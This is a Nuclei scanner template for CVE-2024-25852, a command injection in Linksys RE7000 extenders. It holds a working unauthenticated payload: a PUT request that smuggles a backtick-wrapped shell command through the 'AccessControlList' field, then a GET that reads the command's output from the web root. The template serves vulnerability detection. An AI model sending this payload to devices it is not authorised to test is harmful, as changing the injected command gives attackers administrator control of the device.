id: CVE-2024-25852

info:
  name: Linksys RE7000 - Command Injection
  author: s4e-io
  severity: high
  description: |
    Linksys RE7000 v2.0.9, v2.0.11, and v2.0.15 have a command execution vulnerability in the "AccessControlList" parameter of the access control function point
  remediation: |
    Apply the latest security patches and updates from the vendor to address this vulnerability.
  impact: An attacker can use the vulnerability to obtain device administrator rights.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-25852
    - https://github.com/ZackSecurity/VulnerReport/blob/cve/Linksys/1.md
    - https://immense-mirror-b42.notion.site/Linksys-RE7000-command-injection-vulnerability-c1a47abf5e8d4dd0934d20d77da930bd
  classification:
    epss-score: 0.93046
    epss-percentile: 0.99793
  metadata:
    verified: true
    max-request: 1
    vendor: Linksys
    product: RE7000
  tags: cve,cve2024,unauth,injection,vkev,vuln

variables:
  filename: "{{rand_base(5)}}"

http:
  - raw:
      - |
        PUT /goform/AccessControl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"AccessPolicy":"0","AccessControlList":"`ps>/etc_ro/lighttpd/RE7000_www/{{filename}}.txt`"}

  - raw:
      - |
        GET /{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_1,"result","success") && contains_all(body_2,"PID","USER","VSZ","STAT","COMMAND")'
          - "status_code_1 == 200 && status_code_2 == 200"
        condition: and
# digest: 4b0a00483046022100e5f8c99f069b9861d9006448cbff67539eea4e98b6a70f113effc461acf44fef022100dedd948f15047af1ea93a97054ae0da3ae78809555eef506fd1685984db8c651:922c64590222798bb761d5b6d8e72950